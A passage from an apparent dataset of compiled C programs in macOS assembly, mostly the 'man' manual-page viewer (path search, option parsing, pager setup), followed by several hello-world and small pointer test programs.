$al killed $eax cmpl $0, -2128(%rbp) movb %al, -2177(%rbp) ## 1-byte Spill jne LBB7_22 ## %bb.21: ## in Loop: Header=BB7_16 Depth=2 movl -2132(%rbp), %eax addl $-1, %eax movl %eax, -2132(%rbp) cmpl $0, %eax setne %al movb %al, -2177(%rbp) ## 1-byte Spill LBB7_22: ## in Loop: Header=BB7_16 Depth=2 movb -2177(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB7_16 ## %bb.23: ## in Loop: Header=BB7_8 Depth=1 cmpl $0, _all(%rip) je LBB7_25 ## %bb.24: ## in Loop: Header=BB7_8 Depth=1 movl $0, -2128(%rbp) LBB7_25: ## in Loop: Header=BB7_8 Depth=1 jmp LBB7_8 LBB7_26: cmpl $0, -2124(%rbp) jge LBB7_29 ## %bb.27: movq -2104(%rbp), %rdi callq _ferror cmpl $0, %eax je LBB7_29 ## %bb.28: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -2192(%rbp) ## 8-byte Spill callq ___error movl (%rax), %edi callq _strerror movq -2192(%rbp), %rdi ## 8-byte Reload movq %rax, %rcx leaq L_.str.6(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax leaq -1040(%rbp), %rdx callq _fprintf movl $1, %edi callq _exit LBB7_29: movq -2104(%rbp), %rdi callq _fclose movl -2128(%rbp), %eax movl %eax, -2068(%rbp) LBB7_30: movl -2068(%rbp), %eax movl %eax, -2196(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB7_32 ## %bb.31: movl -2196(%rbp), %eax ## 4-byte Reload addq $2224, %rsp ## imm = 0x8B0 popq %rbp retq LBB7_32: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _trysubmandir ## -- Begin function trysubmandir .p2align 4, 0x90 _trysubmandir: ## @trysubmandir .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $1104, %rsp ## imm = 0x450 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -1056(%rbp) movq %rsi, -1064(%rbp) movq %rdx, -1072(%rbp) movq -1056(%rbp), %rdi callq _opendir$INODE64 movq %rax, -1080(%rbp) cmpq $0, %rax jne LBB8_2 ## %bb.1: movl $0, -1044(%rbp) jmp LBB8_18 LBB8_2: jmp LBB8_3 LBB8_3: ## =>This Inner Loop Header: Depth=1 movq -1080(%rbp), %rdi callq _readdir$INODE64 movq %rax, -1088(%rbp) cmpq $0, %rax je LBB8_17 ## %bb.4: ## in Loop: Header=BB8_3 Depth=1 movq -1088(%rbp), %rdi addq $21, %rdi leaq L_.str.33(%rip), %rsi callq _strcmp cmpl $0, %eax je LBB8_6 ## %bb.5: ## in Loop: Header=BB8_3 Depth=1 movq -1088(%rbp), %rdi addq $21, %rdi leaq L_.str.34(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB8_7 LBB8_6: ## in Loop: Header=BB8_3 Depth=1 jmp LBB8_3 LBB8_7: ## in Loop: Header=BB8_3 Depth=1 movq -1088(%rbp), %rdi addq $21, %rdi leaq L_.str.35(%rip), %rsi movl $3, %edx callq _strncmp cmpl $0, %eax je LBB8_9 ## %bb.8: ## in Loop: Header=BB8_3 Depth=1 movq -1088(%rbp), %rdi addq $21, %rdi leaq L_.str.2(%rip), %rsi movl $3, %edx callq _strncmp cmpl $0, %eax jne LBB8_11 LBB8_9: ## in Loop: Header=BB8_3 Depth=1 movq -1088(%rbp), %rax movsbl 24(%rax), %eax subl $48, %eax cmpl $9, %eax ja LBB8_11 ## %bb.10: ## in Loop: Header=BB8_3 Depth=1 jmp LBB8_3 LBB8_11: ## in Loop: Header=BB8_3 Depth=1 movq -1056(%rbp), %rdi callq _strlen addq $1, %rax movq %rax, -1096(%rbp) ## 8-byte Spill movq -1088(%rbp), %rdi addq $21, %rdi callq _strlen movq %rax, %rcx movq -1096(%rbp), %rax ## 8-byte Reload addq %rcx, %rax addq $1, %rax cmpq $1024, %rax ## imm = 0x400 jbe LBB8_13 ## %bb.12: ## in Loop: Header=BB8_3 Depth=1 jmp LBB8_3 LBB8_13: ## in Loop: Header=BB8_3 Depth=1 leaq -1040(%rbp), %rdi movq -1056(%rbp), %r8 movq -1088(%rbp), %r9 addq $21, %r9 xorl %esi, %esi movl $1024, %edx ## imm = 0x400 leaq L_.str.36(%rip), %rcx movb $0, %al callq ___sprintf_chk leaq -1040(%rbp), %rdi movq -1064(%rbp), %rsi movq -1072(%rbp), %rdx callq _trymandir cmpl $0, %eax je LBB8_16 ## %bb.14: ## in Loop: Header=BB8_3 Depth=1 cmpl $0, _all(%rip) jne LBB8_16 ## %bb.15: movq -1080(%rbp), %rdi callq _closedir movl $1, -1044(%rbp) jmp LBB8_18 LBB8_16: ## in Loop: Header=BB8_3 Depth=1 jmp LBB8_3 LBB8_17: movq -1080(%rbp), %rdi callq _closedir movl $0, -1044(%rbp) LBB8_18: movl -1044(%rbp), %eax movl %eax, -1100(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB8_20 ## %bb.19: movl -1100(%rbp), %eax ## 4-byte Reload addq $1104, %rsp ## imm = 0x450 popq %rbp retq LBB8_20: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _searchmanpath ## -- Begin function searchmanpath .p2align 4, 0x90 _searchmanpath: ## @searchmanpath .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $1088, %rsp ## imm = 0x440 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -1048(%rbp) movq %rsi, -1056(%rbp) movq _manpath@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -1064(%rbp) LBB9_1: ## =>This Loop Header: Depth=1 ## Child Loop BB9_2 Depth 2 ## Child Loop BB9_9 Depth 2 jmp LBB9_2 LBB9_2: ## Parent Loop BB9_1 Depth=1 ## => This Inner Loop Header: Depth=2 movq -1064(%rbp), %rax movsbl (%rax), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, %ecx movb %al, -1073(%rbp) ## 1-byte Spill je LBB9_4 ## %bb.3: ## in Loop: Header=BB9_2 Depth=2 movq -1064(%rbp), %rax movsbl (%rax), %eax cmpl $58, %eax sete %al movb %al, -1073(%rbp) ## 1-byte Spill LBB9_4: ## in Loop: Header=BB9_2 Depth=2 movb -1073(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB9_5 jmp LBB9_6 LBB9_5: ## in Loop: Header=BB9_2 Depth=2 movq -1064(%rbp), %rax addq $1, %rax movq %rax, -1064(%rbp) jmp LBB9_2 LBB9_6: ## in Loop: Header=BB9_1 Depth=1 movq -1064(%rbp), %rax movsbl (%rax), %eax cmpl $0, %eax jne LBB9_8 ## %bb.7: jmp LBB9_24 LBB9_8: ## in Loop: Header=BB9_1 Depth=1 leaq -1040(%rbp), %rax movq %rax, -1072(%rbp) LBB9_9: ## Parent Loop BB9_1 Depth=1 ## => This Inner Loop Header: Depth=2 movq -1064(%rbp), %rax movsbl (%rax), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, %ecx movb %al, -1074(%rbp) ## 1-byte Spill je LBB9_11 ## %bb.10: ## in Loop: Header=BB9_9 Depth=2 movq -1064(%rbp), %rax movsbl (%rax), %eax cmpl $58, %eax setne %al movb %al, -1074(%rbp) ## 1-byte Spill LBB9_11: ## in Loop: Header=BB9_9 Depth=2 movb -1074(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB9_12 jmp LBB9_15 LBB9_12: ## in Loop: Header=BB9_9 Depth=2 movq -1072(%rbp), %rax leaq -1040(%rbp), %rcx addq $1024, %rcx ## imm = 0x400 cmpq %rcx, %rax jae LBB9_14 ## %bb.13: ## in Loop: Header=BB9_9 Depth=2 movq -1064(%rbp), %rax movb (%rax), %cl movq -1072(%rbp), %rax movq %rax, %rdx addq $1, %rdx movq %rdx, -1072(%rbp) movb %cl, (%rax) LBB9_14: ## in Loop: Header=BB9_9 Depth=2 movq -1064(%rbp), %rax addq $1, %rax movq %rax, -1064(%rbp) jmp LBB9_9 LBB9_15: ## in Loop: Header=BB9_1 Depth=1 movq -1072(%rbp), %rax leaq -1040(%rbp), %rcx addq $1024, %rcx ## imm = 0x400 cmpq %rcx, %rax jne LBB9_17 ## %bb.16: ## in Loop: Header=BB9_1 Depth=1 jmp LBB9_1 LBB9_17: ## in Loop: Header=BB9_1 Depth=1 movq -1072(%rbp), %rax movb $0, (%rax) leaq -1040(%rbp), %rdi movq -1048(%rbp), %rsi movq -1056(%rbp), %rdx callq _trysubmandir cmpl $0, %eax je LBB9_20 ## %bb.18: ## in Loop: Header=BB9_1 Depth=1 cmpl $0, _all(%rip) jne LBB9_20 ## %bb.19: jmp LBB9_24 LBB9_20: ## in Loop: Header=BB9_1 Depth=1 leaq -1040(%rbp), %rdi movq -1048(%rbp), %rsi movq -1056(%rbp), %rdx callq _trymandir cmpl $0, %eax je LBB9_23 ## %bb.21: ## in Loop: Header=BB9_1 Depth=1 cmpl $0, _all(%rip) jne LBB9_23 ## %bb.22: jmp LBB9_24 LBB9_23: ## in Loop: Header=BB9_1 Depth=1 jmp LBB9_1 LBB9_24: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB9_26 ## %bb.25: addq $1088, %rsp ## imm = 0x440 popq %rbp retq LBB9_26: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _usage ## -- Begin function usage .p2align 4, 0x90 _usage: ## @usage .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.37(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl $1, %edi callq _exit .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $64, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) leaq _ALL(%rip), %rax movq %rax, -32(%rbp) movl $0, -40(%rbp) leaq L_.str.38(%rip), %rdi callq _getenv movq _pager@GOTPCREL(%rip), %rcx movq %rax, (%rcx) cmpq $0, %rax jne LBB11_2 ## %bb.1: movq _pager@GOTPCREL(%rip), %rax leaq _PAGER(%rip), %rcx movq %rcx, (%rax) LBB11_2: leaq L_.str.39(%rip), %rdi callq _getenv movq _manpath@GOTPCREL(%rip), %rcx movq %rax, (%rcx) cmpq $0, %rax jne LBB11_4 ## %bb.3: movq _manpath@GOTPCREL(%rip), %rax leaq _MANPATH(%rip), %rcx movq %rcx, (%rax) LBB11_4: movl $1, %edi callq _isatty movl %eax, %ecx movq _tty@GOTPCREL(%rip), %rax movl %ecx, (%rax) movl $1, -36(%rbp) LBB11_5: ## =>This Loop Header: Depth=1 ## Child Loop BB11_6 Depth 2 ## Child Loop BB11_14 Depth 3 jmp LBB11_6 LBB11_6: ## Parent Loop BB11_5 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB11_14 Depth 3 movl -36(%rbp), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl -8(%rbp), %ecx movb %al, -49(%rbp) ## 1-byte Spill jge LBB11_9 ## %bb.7: ## in Loop: Header=BB11_6 Depth=2 movq -16(%rbp), %rax movslq -36(%rbp), %rcx movq (%rax,%rcx,8), %rax movsbl (%rax), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $45, %ecx movb %al, -49(%rbp) ## 1-byte Spill jne LBB11_9 ## %bb.8: ## in Loop: Header=BB11_6 Depth=2 cmpl $0, -40(%rbp) setne %al xorb $-1, %al movb %al, -49(%rbp) ## 1-byte Spill LBB11_9: ## in Loop: Header=BB11_6 Depth=2 movb -49(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB11_10 jmp LBB11_37 LBB11_10: ## in Loop: Header=BB11_6 Depth=2 movq -16(%rbp), %rax movl -36(%rbp), %ecx movl %ecx, %edx addl $1, %edx movl %edx, -36(%rbp) movslq %ecx, %rcx movq (%rax,%rcx,8), %rax addq $1, %rax movq %rax, -48(%rbp) movq -48(%rbp), %rax movsbl (%rax), %eax cmpl $45, %eax jne LBB11_13 ## %bb.11: ## in Loop: Header=BB11_6 Depth=2 movq -48(%rbp), %rax movsbl 1(%rax), %eax cmpl $0, %eax jne LBB11_13 ## %bb.12: ## in Loop: Header=BB11_5 Depth=1 movl $1, -40(%rbp) jmp LBB11_37 LBB11_13: ## in Loop: Header=BB11_6 Depth=2 jmp LBB11_14 LBB11_14: ## Parent Loop BB11_5 Depth=1 ## Parent Loop BB11_6 Depth=2 ## => This Inner Loop Header: Depth=3 movq -48(%rbp), %rax movsbl (%rax), %eax cmpl $0, %eax je LBB11_36 ## %bb.15: ## in Loop: Header=BB11_14 Depth=3 movq -48(%rbp), %rax movq %rax, %rcx incq %rcx movq %rcx, -48(%rbp) movsbl (%rax), %eax addl $-77, %eax movl %eax, %ecx movq %rcx, -64(%rbp) ## 8-byte Spill subl $39, %eax ja LBB11_34 ## %bb.57: ## in Loop: Header=BB11_14 Depth=3 movq -64(%rbp), %rax ## 8-byte Reload leaq LJTI11_0(%rip), %rcx movslq (%rcx,%rax,4), %rax addq %rcx, %rax jmpq *%rax LBB11_16: ## in Loop: Header=BB11_14 Depth=3 movl $1, _all(%rip) jmp LBB11_35 LBB11_17: ## in Loop: Header=BB11_14 Depth=3 movl $1, _whatis(%rip) jmp LBB11_35 LBB11_18: ## in Loop: Header=BB11_14 Depth=3 movl $1, _apropos(%rip) jmp LBB11_35 LBB11_19: ## in Loop: Header=BB11_14 Depth=3 movl $1, _quiet(%rip) jmp LBB11_35 LBB11_20: ## in Loop: Header=BB11_14 Depth=3 movl $0, _rofftype(%rip) movl $0, _whatis(%rip) movl $0, _apropos(%rip) jmp LBB11_35 LBB11_21: ## in Loop: Header=BB11_14 Depth=3 movl $1, _rofftype(%rip) movl $0, _whatis(%rip) movl $0, _apropos(%rip) jmp LBB11_35 LBB11_22: ## in Loop: Header=BB11_14 Depth=3 movq -48(%rbp), %rax movsbl (%rax), %eax cmpl $0, %eax jne LBB11_26 ## %bb.23: ## in Loop: Header=BB11_14 Depth=3 movl -36(%rbp), %eax cmpl -8(%rbp), %eax jne LBB11_25 ## %bb.24: ## in Loop: Header=BB11_14 Depth=3 callq _usage LBB11_25: ## in Loop: Header=BB11_14 Depth=3 movq -16(%rbp), %rax movl -36(%rbp), %ecx movl %ecx, %edx addl $1, %edx movl %edx, -36(%rbp) movslq %ecx, %rcx movq (%rax,%rcx,8), %rax movq %rax, -32(%rbp) jmp LBB11_27 LBB11_26: ## in Loop: Header=BB11_14 Depth=3 movq -48(%rbp), %rax movq %rax, -32(%rbp) leaq L_.str.40(%rip), %rax movq %rax, -48(%rbp) LBB11_27: ## in Loop: Header=BB11_14 Depth=3 jmp LBB11_35 LBB11_28: ## in Loop: Header=BB11_14 Depth=3 movq -48(%rbp), %rax movsbl (%rax), %eax cmpl $0, %eax jne LBB11_32 ## %bb.29: ## in Loop: Header=BB11_14 Depth=3 movl -36(%rbp), %eax cmpl -8(%rbp), %eax jne LBB11_31 ## %bb.30: ## in Loop: Header=BB11_14 Depth=3 callq _usage LBB11_31: ## in Loop: Header=BB11_14 Depth=3 movq -16(%rbp), %rax movl -36(%rbp), %ecx movl %ecx, %edx addl $1, %edx movl %edx, -36(%rbp) movslq %ecx, %rcx movq (%rax,%rcx,8), %rcx movq _manpath@GOTPCREL(%rip), %rax movq %rcx, (%rax) jmp LBB11_33 LBB11_32: ## in Loop: Header=BB11_14 Depth=3 movq -48(%rbp), %rcx movq _manpath@GOTPCREL(%rip), %rax movq %rcx, (%rax) leaq L_.str.40(%rip), %rax movq %rax, -48(%rbp) LBB11_33: ## in Loop: Header=BB11_14 Depth=3 jmp LBB11_35 LBB11_34: ## in Loop: Header=BB11_14 Depth=3 callq _usage LBB11_35: ## in Loop: Header=BB11_14 Depth=3 jmp LBB11_14 LBB11_36: ## in Loop: Header=BB11_6 Depth=2 jmp LBB11_6 LBB11_37: ## in Loop: Header=BB11_5 Depth=1 movl -36(%rbp), %eax cmpl -8(%rbp), %eax jl LBB11_39 ## %bb.38: ## in Loop: Header=BB11_5 Depth=1 callq _usage LBB11_39: ## in Loop: Header=BB11_5 Depth=1 movq -16(%rbp), %rax movslq -36(%rbp), %rcx movq (%rax,%rcx,8), %rax movsbl (%rax), %eax subl $48, %eax cmpl $9, %eax ja LBB11_42 ## %bb.40: ## in Loop: Header=BB11_5 Depth=1 movq -16(%rbp), %rax movslq -36(%rbp), %rcx movq (%rax,%rcx,8), %rax movsbl 1(%rax), %eax cmpl $0, %eax jne LBB11_42 ## %bb.41: ## in Loop: Header=BB11_5 Depth=1 movq -16(%rbp), %rax movl -36(%rbp), %ecx movl %ecx, %edx addl $1, %edx movl %edx, -36(%rbp) movslq %ecx, %rcx movq (%rax,%rcx,8), %rax movq %rax, -32(%rbp) LBB11_42: ## in Loop: Header=BB11_5 Depth=1 movl -36(%rbp), %eax cmpl -8(%rbp), %eax jne LBB11_44 ## %bb.43: ## in Loop: Header=BB11_5 Depth=1 callq _usage LBB11_44: ## in Loop: Header=BB11_5 Depth=1 movq -16(%rbp), %rax movl -36(%rbp), %ecx movl %ecx, %edx addl $1, %edx movl %edx, -36(%rbp) movslq %ecx, %rcx movq (%rax,%rcx,8), %rax movq %rax, -24(%rbp) cmpl $0, _whatis(%rip) jne LBB11_46 ## %bb.45: ## in Loop: Header=BB11_5 Depth=1 cmpl $0, _apropos(%rip) je LBB11_47 LBB11_46: ## in Loop: Header=BB11_5 Depth=1 movq -24(%rbp), %rdi callq _keyword jmp LBB11_54 LBB11_47: ## in Loop: Header=BB11_5 Depth=1 movq _shown@GOTPCREL(%rip), %rax movl $0, (%rax) movq -24(%rbp), %rdi movq -32(%rbp), %rsi callq _searchmanpath movq _shown@GOTPCREL(%rip), %rax cmpl $0, (%rax) jne LBB11_49 ## %bb.48: ## in Loop: Header=BB11_5 Depth=1 movq -24(%rbp), %rdi movl $2, %esi leaq L_.str.32(%rip), %rdx callq _showpage LBB11_49: ## in Loop: Header=BB11_5 Depth=1 movq _shown@GOTPCREL(%rip), %rax cmpl $0, (%rax) jne LBB11_53 ## %bb.50: cmpl $0, _quiet(%rip) jne LBB11_52 ## %bb.51: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi movq -24(%rbp), %rdx leaq L_.str.41(%rip), %rsi movb $0, %al callq _fprintf LBB11_52: movl $1, %edi callq _exit LBB11_53: ## in Loop: Header=BB11_5 Depth=1 jmp LBB11_54 LBB11_54: ## in Loop: Header=BB11_5 Depth=1 jmp LBB11_55 LBB11_55: ## in Loop: Header=BB11_5 Depth=1 movl -36(%rbp), %eax cmpl -8(%rbp), %eax jl LBB11_5 ## %bb.56: xorl %eax, %eax addq $64, %rsp popq %rbp retq .cfi_endproc .p2align 2, 0x90 .data_region jt32 .set L11_0_set_28, LBB11_28-LJTI11_0 .set L11_0_set_34, LBB11_34-LJTI11_0 .set L11_0_set_16, LBB11_16-LJTI11_0 .set L11_0_set_17, LBB11_17-LJTI11_0 .set L11_0_set_18, LBB11_18-LJTI11_0 .set L11_0_set_20, LBB11_20-LJTI11_0 .set L11_0_set_19, LBB11_19-LJTI11_0 .set L11_0_set_22, LBB11_22-LJTI11_0 .set L11_0_set_21, LBB11_21-LJTI11_0 LJTI11_0: .long L11_0_set_28 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_16 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_17 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_18 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_20 .long L11_0_set_34 .long L11_0_set_34 .long L11_0_set_19 .long L11_0_set_34 .long L11_0_set_22 .long L11_0_set_21 .end_data_region ## -- End function .section __DATA,__data .globl _MANPATH ## @MANPATH .p2align 4 _MANPATH: .asciz "/usr/local/man:/usr/man:/usr/gnu/man" .globl _PAGER ## @PAGER _PAGER: .asciz "more" .globl _TBL_MAGIC ## @TBL_MAGIC _TBL_MAGIC: .asciz ".\\\"t\n" .zerofill __DATA,__bss,_searchwhatis.page,256,4 ## @searchwhatis.page .zerofill __DATA,__bss,_searchwhatis.section,32,4 ## @searchwhatis.section .zerofill __DATA,__bss,_searchwindex.page,256,4 ## @searchwindex.page .zerofill __DATA,__bss,_searchwindex.section,32,4 ## @searchwindex.section .zerofill __DATA,__bss,_searchwindex.low,8,3 ## @searchwindex.low .zerofill __DATA,__bss,_searchwindex.high,8,3 ## @searchwindex.high .globl _ALL ## @ALL .zerofill __DATA,__common,_ALL,1,0 .globl _all ## @all .zerofill __DATA,__common,_all,4,2 .globl _whatis ## @whatis .zerofill __DATA,__common,_whatis,4,2 .globl _apropos ## @apropos .zerofill __DATA,__common,_apropos,4,2 .globl _quiet ## @quiet .zerofill __DATA,__common,_quiet,4,2 .globl _rofftype ## @rofftype .zerofill __DATA,__common,_rofftype,4,2 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "nroff" L_.str.1: ## @.str.1 .asciz "troff" .section __DATA,__data .globl _roff ## @roff .p2align 4 _roff: .quad L_.str .quad L_.str.1 .comm _pipeline,512,4 ## @pipeline .globl _plast ## @plast .p2align 3 _plast: .quad _pipeline .comm _tty,4,2 ## @tty .comm _pager,8,3 ## @pager .section __TEXT,__cstring,cstring_literals L_.str.2: ## @.str.2 .asciz "cat" L_.str.3: ## @.str.3 .asciz "man: can't create a pipe: %s\n" L_.str.4: ## @.str.4 .asciz "man: cannot fork: %s\n" .comm _manpath,8,3 ## @manpath L_.str.5: ## @.str.5 .asciz "MANPATH=" L_.str.6: ## @.str.6 .asciz "man: %s: %s\n" L_.str.7: ## @.str.7 .asciz "man: wait(): %s\n" L_.str.8: ## @.str.8 .asciz "apropos" L_.str.9: ## @.str.9 .asciz "whatis" L_.str.10: ## @.str.10 .asciz "-a" L_.str.11: ## @.str.11 .asciz "Looking for keyword '%s'\n" .comm _shown,4,2 ## @shown L_.str.12: ## @.str.12 .asciz "zcat" L_.str.13: ## @.str.13 .asciz "/usr/lib/sgml/sgml2roff" L_.str.14: ## @.str.14 .asciz "tbl" L_.str.15: ## @.str.15 .asciz "eqn" L_.str.16: ## @.str.16 .asciz "r" L_.str.17: ## @.str.17 .asciz "%s %s\n" L_.str.18: ## @.str.18 .asciz "Showing" L_.str.19: ## @.str.19 .asciz "Formatting" .section __DATA,__data .p2align 4 ## @trymandir.searchN _trymandir.searchN: .long 0 ## 0x0 .space 4 .quad L_.str.20 .long 1 ## 0x1 .space 4 .quad L_.str.21 .long 2 ## 0x2 .space 4 .quad L_.str.22 .long 3 ## 0x3 .space 4 .quad L_.str.23 .long 4 ## 0x4 .space 4 .quad L_.str.24 .long 5 ## 0x5 .space 4 .quad L_.str.25 .long 0 ## 0x0 .space 4 .quad L_.str.26 .long 1 ## 0x1 .space 4 .quad L_.str.27 .long 2 ## 0x2 .space 4 .quad L_.str.28 .long 3 ## 0x3 .space 4 .quad L_.str.29 .section __TEXT,__cstring,cstring_literals L_.str.20: ## @.str.20 .asciz "%s/cat%s/%s.%s" L_.str.21: ## @.str.21 .asciz "%s/cat%s/%s.%s.Z" L_.str.22: ## @.str.22 .asciz "%s/man%s/%s.%s" L_.str.23: ## @.str.23 .asciz "%s/man%s/%s.%s.Z" L_.str.24: ## @.str.24 .asciz "%s/sman%s/%s.%s" L_.str.25: ## @.str.25 .asciz "%s/sman%s/%s.%s.Z" L_.str.26: ## @.str.26 .asciz "%s/cat%.1s/%s.%s" L_.str.27: ## @.str.27 .asciz "%s/cat%.1s/%s.%s.Z" L_.str.28: ## @.str.28 .asciz "%s/man%.1s/%s.%s" L_.str.29: ## @.str.29 .asciz "%s/man%.1s/%s.%s.Z" L_.str.30: ## @.str.30 .asciz "%s/windex" L_.str.31: ## @.str.31 .asciz "%s/whatis" L_.str.32: ## @.str.32 .asciz "-man" L_.str.33: ## @.str.33 .asciz "." L_.str.34: ## @.str.34 .asciz ".." L_.str.35: ## @.str.35 .asciz "man" L_.str.36: ## @.str.36 .asciz "%s/%s" L_.str.37: ## @.str.37 .asciz "Usage: man -[antfkq] [-M path] [-s section] title ...\n" L_.str.38: ## @.str.38 .asciz "PAGER" L_.str.39: ## @.str.39 .asciz "MANPATH" L_.str.40: ## @.str.40 .space 1 L_.str.41: ## @.str.41 .asciz "man: no manual on %s\n" .subsections_via_symbols
the_stack_data/995197.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/57639.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov w0, #0 ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "hello, world\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp leaq L_.str(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "hello, world\n" .subsections_via_symbols
the_stack_data/90761735.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _foo ; -- Begin function foo .p2align 2 _foo: ; @foo .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] str x1, [sp] ldr x8, [sp] str x8, [sp, #8] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] add x9, sp, #28 sub x8, x29, #16 stur x9, [x29, #-16] add x9, sp, #24 stur x9, [x29, #-24] str x8, [sp, #32] add x8, sp, #16 str x8, [sp, #8] add x8, sp, #4 str x8, [sp, #16] mov w8, #9 str w8, [sp, #4] ldr x8, [sp, #8] str x8, [sp, #32] ldr x0, [sp, #8] ldr x1, [sp, #32] bl _foo ldr w8, [sp, #28] subs w8, w8, #5 cset w8, ne tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: ldr x8, [sp, #32] ldr x9, [x8] mov w8, #10 str w8, [x9] b LBB1_3 LBB1_2: ldur x9, [x29, #-24] mov w8, #100 str w8, [x9] b LBB1_3 LBB1_3: b LBB1_4 LBB1_4: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #4] subs w8, w8, #10 cset w8, le tbnz w8, #0, LBB1_6 b LBB1_5 LBB1_5: ; in Loop: Header=BB1_4 Depth=1 ldr x9, [sp, #16] mov w8, #100 str w8, [x9] b LBB1_4 LBB1_6: mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .subsections_via_symbols
